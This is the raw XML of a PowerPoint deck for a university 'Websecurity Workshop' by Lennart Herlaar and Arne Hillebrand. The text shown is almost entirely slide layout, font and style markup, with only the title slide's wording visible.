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74" r:id="rId2"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId41"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId42"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="826" r:id="rId3"/>
    <p:sldId id="827" r:id="rId4"/>
    <p:sldId id="880" r:id="rId5"/>
    <p:sldId id="881" r:id="rId6"/>
    <p:sldId id="882" r:id="rId7"/>
    <p:sldId id="883" r:id="rId8"/>
    <p:sldId id="884" r:id="rId9"/>
    <p:sldId id="885" r:id="rId10"/>
    <p:sldId id="886" r:id="rId11"/>
    <p:sldId id="887" r:id="rId12"/>
    <p:sldId id="888" r:id="rId13"/>
    <p:sldId id="889" r:id="rId14"/>
    <p:sldId id="890" r:id="rId15"/>
    <p:sldId id="877" r:id="rId16"/>
    <p:sldId id="878" r:id="rId17"/>
    <p:sldId id="879" r:id="rId18"/>
    <p:sldId id="842" r:id="rId19"/>
    <p:sldId id="843" r:id="rId20"/>
    <p:sldId id="844" r:id="rId21"/>
    <p:sldId id="845" r:id="rId22"/>
    <p:sldId id="846" r:id="rId23"/>
    <p:sldId id="847" r:id="rId24"/>
    <p:sldId id="848" r:id="rId25"/>
    <p:sldId id="849" r:id="rId26"/>
    <p:sldId id="850" r:id="rId27"/>
    <p:sldId id="851" r:id="rId28"/>
    <p:sldId id="852" r:id="rId29"/>
    <p:sldId id="853" r:id="rId30"/>
    <p:sldId id="854" r:id="rId31"/>
    <p:sldId id="855" r:id="rId32"/>
    <p:sldId id="856" r:id="rId33"/>
    <p:sldId id="857" r:id="rId34"/>
    <p:sldId id="858" r:id="rId35"/>
    <p:sldId id="859" r:id="rId36"/>
    <p:sldId id="860" r:id="rId37"/>
    <p:sldId id="861" r:id="rId38"/>
    <p:sldId id="862" r:id="rId39"/>
    <p:sldId id="863" r:id="rId40"/>
  </p:sldIdLst>
  <p:sldSz cx="9902825" cy="6858000"/>
  <p:notesSz cx="6780213" cy="99107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0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20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30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4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506" algn="l" defTabSz="45710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608" algn="l" defTabSz="45710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9709" algn="l" defTabSz="45710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6810" algn="l" defTabSz="45710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2">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="21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40"/>
    <a:srgbClr val="FFFCCE"/>
    <a:srgbClr val="FFF4D9"/>
    <a:srgbClr val="A799FF"/>
    <a:srgbClr val="FF87AF"/>
    <a:srgbClr val="A8D3FF"/>
    <a:srgbClr val="FF9900"/>
    <a:srgbClr val="99FF99"/>
    <a:srgbClr val="A50021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6"/>
    <p:restoredTop sz="94393"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="106" d="100"/>
          <a:sy n="106" d="100"/>
        </p:scale>
        <p:origin x="-1596" y="-90"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="3119"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="245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114" d="100"/>
          <a:sy n="114" d="100"/>
        </p:scale>
        <p:origin x="-3624" y="-104"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="3122"/>
        <p:guide pos="21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53412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3" rIns="91814" bIns="45903" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="919163" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr sz="1200" b="1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err="1"/>
              <a:t>Webtechnologie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – The web programming environment, client side representation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3" rIns="91814" bIns="45903" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="919163" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr sz="1200" b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0225"/>
            <a:ext cx="51244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3" rIns="91814" bIns="45903" numCol="1" anchor="b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="919163" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr sz="1200" b="1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029325" y="9420225"/>
            <a:ext cx="603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3" rIns="91814" bIns="45903" numCol="1" anchor="b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="919163" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="1200" b="1">
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{0BA84180-CEB7-5649-A96D-DA8F895AA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69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3" rIns="91814" bIns="45903" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="919163" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr sz="1200" b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3" rIns="91814" bIns="45903" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="919163" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr sz="1200" b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50888" y="776288"/>
            <a:ext cx="5286375" cy="3662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673600"/>
            <a:ext cx="4975225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3" rIns="91814" bIns="45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0225"/>
            <a:ext cx="29384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3" rIns="91814" bIns="45903" numCol="1" anchor="b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="919163" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr sz="1200" b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0225"/>
            <a:ext cx="29384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3" rIns="91814" bIns="45903" numCol="1" anchor="b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="919163" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="1200" b="1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8023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101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204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303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40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5506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08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09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10" algn="l" defTabSz="9142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776288"/>
            <a:ext cx="5289550" cy="3662362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6868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Lennart Herlaar - UU</a:t>
            </a:r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CA9204-321E-2449-9DFD-EF7D3262AD03}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>1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27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63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11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44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48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71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36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776288"/>
            <a:ext cx="5289550" cy="3662362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6868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Lennart Herlaar - UU</a:t>
            </a:r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CA9204-321E-2449-9DFD-EF7D3262AD03}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>17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08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74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69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776288"/>
            <a:ext cx="5289550" cy="3662362"/>
          </a:xfrm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9940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Lennart Herlaar - UU</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3994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747484-831E-DC42-8582-DC0273A1CEBE}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>2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36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03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88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48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92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78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19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64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32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776288"/>
            <a:ext cx="5289550" cy="3662362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6868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Lennart Herlaar - UU</a:t>
            </a:r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CA9204-321E-2449-9DFD-EF7D3262AD03}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>28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2490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8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5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74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678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330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776288"/>
            <a:ext cx="5289550" cy="3662362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6868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Lennart Herlaar - UU</a:t>
            </a:r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CA9204-321E-2449-9DFD-EF7D3262AD03}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>33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1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516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44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308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171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06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37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17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01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2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2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Lennart Herlaar - UU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7B36-6264-3E48-BB16-0640361AEFF2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0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102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1" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914204" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371303" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828405" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2285506" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2742608" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3199709" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="365681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57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07525" y="6400800"/>
            <a:ext cx="495300" cy="4572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fld id="{8874EAD3-9048-3C41-9F48-3EB10BE54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6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28600"/>
            <a:ext cx="2227263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9743" y="228600"/>
            <a:ext cx="6532562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07525" y="6400800"/>
            <a:ext cx="495300" cy="4572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fld id="{2BC69E53-4F0A-344C-9073-8D94F99F2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02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76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12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854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527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E515-7C76-B944-BB48-23C5C811387D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A73E0-8FE6-B44B-8898-FE054E6B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92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3"/>
            <a:ext cx="8416925" cy="1362076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A8232-097A-8F45-B9DE-4136ABFAFE1C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E0893-9F61-1A4A-B0D9-1C7FE496E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14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5" y="1600206"/>
            <a:ext cx="4379913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0206"/>
            <a:ext cx="4379912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A8324-DD62-8C43-8990-B9B755BDAC12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18FA2-7DCD-B347-9C36-EBD0B2081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4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6"/>
            <a:ext cx="437515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01" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000" b="1"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914204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5" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2285506" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2742608" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3199709" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="365681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515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92" y="1535116"/>
            <a:ext cx="4376737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01" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000" b="1"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914204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5" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2285506" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2742608" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3199709" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="365681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92" y="2174875"/>
            <a:ext cx="4376737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0139D-8F11-6548-AEB9-259A58FEF7C0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16E7F-43D3-524D-8069-AB28463B5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04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CB380-EB27-774A-919A-7B0E3CD9688E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D3F97-B405-D141-BABF-DFF5E1876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10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A72AC-E328-8244-AF2D-617FA7A3DD7B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C4626-3A51-1944-9DA9-DCBD4DC93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8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2"/>
            <a:ext cx="3257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7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4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4" indent="0">
              <a:buNone/>
              <a:defRPr sz="1100"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371303" indent="0">
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828405" indent="0">
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2285506" indent="0">
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2742608" indent="0">
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3199709" indent="0">
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="365681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E7BD1-725C-804A-952D-D201643E8384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CD4A7-54DC-674F-9361-B22BF4A78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86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8" y="4800601"/>
            <a:ext cx="5940425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8" y="612775"/>
            <a:ext cx="594042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1" indent="0">
              <a:buNone/>
              <a:defRPr sz="2800"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914204" indent="0">
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371303" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828405" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2285506" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2742608" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3199709" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="365681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8" y="5367342"/>
            <a:ext cx="594042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4" indent="0">
              <a:buNone/>
              <a:defRPr sz="1100"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371303" indent="0">
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828405" indent="0">
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2285506" indent="0">
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2742608" indent="0">
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3199709" indent="0">
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="365681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DE0C6-40F2-FE48-AAF5-0C42F00F602A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0BFE-8EDD-A244-B9A9-D61FBD2F8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23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E7CD8-BDDE-5042-B7C0-09935A93D379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56A4-E62B-994D-B19E-D43A60171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59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4644"/>
            <a:ext cx="222726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1" y="274644"/>
            <a:ext cx="653256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EF0E3-15C2-F641-A0BE-D04C8819D5E8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AB751-8AD0-2845-8945-99F4698D1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0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3"/>
            <a:ext cx="8416925" cy="1362076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1" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914204" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371303" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828405" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2285506" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2742608" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3199709" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="365681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112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6" y="1295400"/>
            <a:ext cx="4351337" cy="5257800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9043" y="1295400"/>
            <a:ext cx="4352925" cy="5257800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07525" y="6400800"/>
            <a:ext cx="495300" cy="4572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fld id="{CCB16F5E-EA96-A043-B11D-7836839FE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9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5" y="274639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6"/>
            <a:ext cx="437515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01" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000" b="1"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914204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5" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2285506" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2742608" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3199709" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="365681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515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92" y="1535116"/>
            <a:ext cx="4376737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01" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000" b="1"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914204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5" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2285506" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2742608" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3199709" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="365681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92" y="2174875"/>
            <a:ext cx="4376737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07525" y="6400800"/>
            <a:ext cx="495300" cy="4572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fld id="{20767081-C1F1-634D-AB90-6887DD754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06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07525" y="6400800"/>
            <a:ext cx="495300" cy="4572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0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07525" y="6400800"/>
            <a:ext cx="495300" cy="4572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1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2"/>
            <a:ext cx="3257550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7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4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4" indent="0">
              <a:buNone/>
              <a:defRPr sz="1100"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371303" indent="0">
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828405" indent="0">
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2285506" indent="0">
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2742608" indent="0">
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3199709" indent="0">
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="365681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07525" y="6400800"/>
            <a:ext cx="495300" cy="4572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fld id="{83DB7187-16A6-2549-B412-4E3422E7E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8" y="4800601"/>
            <a:ext cx="5940425" cy="56674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8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1" indent="0">
              <a:buNone/>
              <a:defRPr sz="2800"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914204" indent="0">
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371303" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828405" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2285506" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2742608" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3199709" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="365681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8" y="5367342"/>
            <a:ext cx="594042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4" indent="0">
              <a:buNone/>
              <a:defRPr sz="1100"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371303" indent="0">
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828405" indent="0">
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2285506" indent="0">
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2742608" indent="0">
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3199709" indent="0">
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="365681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07525" y="6400800"/>
            <a:ext cx="495300" cy="4572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>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{3295F362-6A7D-B149-8A54-EA5F5D805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6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9738" y="228600"/>
            <a:ext cx="84185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6" y="1295400"/>
            <a:ext cx="88487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7" descr="paint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6" y="914407"/>
            <a:ext cx="89122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50" r:id="rId12"/>
    <p:sldLayoutId id="2147483755" r:id="rId13"/>
    <p:sldLayoutId id="2147483762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 Black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 Black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 Black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 Black" pitchFamily="34" charset="0"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="457101"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 Black" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="914204"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 Black" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1371303"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 Black" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1828405"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 Black" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="342826" indent="-34282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790" indent="-28568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800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1142753" indent="-2285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300">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1599854" indent="-2285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ＭＳ Ｐゴシック" charset="0"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="2056956" indent="-2285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ＭＳ Ｐゴシック" charset="0"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="2514058" indent="-2285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6pPr>
      <a:lvl7pPr marL="2971157" indent="-2285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7pPr>
      <a:lvl8pPr marL="3428262" indent="-2285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8pPr>
      <a:lvl9pPr marL="3885362" indent="-2285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2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4" algn="l" defTabSz="9142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9142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5" algn="l" defTabSz="9142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6" algn="l" defTabSz="9142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8" algn="l" defTabSz="9142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9" algn="l" defTabSz="9142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10" algn="l" defTabSz="9142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5" y="274639"/>
            <a:ext cx="8912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5" y="1600206"/>
            <a:ext cx="89122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5" y="6356356"/>
            <a:ext cx="2309813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90DB657-FBC8-544B-875D-4ED2D731BA3E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2963" y="6356356"/>
            <a:ext cx="31369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713" y="6356356"/>
            <a:ext cx="2309812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47CF2E-3319-4943-8527-191B29F76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457101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101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101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101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101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101" algn="ctr" defTabSz="457101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204" algn="ctr" defTabSz="457101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303" algn="ctr" defTabSz="457101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405" algn="ctr" defTabSz="457101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26" indent="-342826" algn="l" defTabSz="45710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790" indent="-285687" algn="l" defTabSz="45710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753" indent="-228550" algn="l" defTabSz="45710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854" indent="-228550" algn="l" defTabSz="45710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956" indent="-228550" algn="l" defTabSz="45710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58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7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62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62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5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8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9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1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055"/>
            <a:ext cx="9919964" cy="7424473"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35842" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="7"/>
            <a:ext cx="9902825" cy="765175"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" charset="0"/>
              </a:rPr>
              <a:t>Websecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" charset="0"/>
              </a:rPr>
              <a:t> Workshop</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Arial Black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296400" y="6343654"/>
            <a:ext cx="606425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90" indent="-28568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53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54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956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058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157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262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362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fld id="{756AECCE-3931-9A49-BFF7-85E53012F1F2}" type="slidenum">
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="5E574E"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="5E574E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35844" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="6119822"/>
            <a:ext cx="9902825" cy="765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b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nl-NL" sz="4500" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" charset="0"/>
              </a:rPr>
              <a:t>Sticky</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="4500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Arial Black" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35845" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="55566" y="6192839"/>
            <a:ext cx="3527694" cy="69215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l-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" charset="0"/>
              </a:rPr>
              <a:t>Lennart  &amp;  Arne           &amp;</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Arial Black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l-NL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" charset="0"/>
              </a:rPr>
              <a:t>Herlaar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" charset="0"/>
              </a:rPr>
              <a:t>       Hillebrand</a:t>
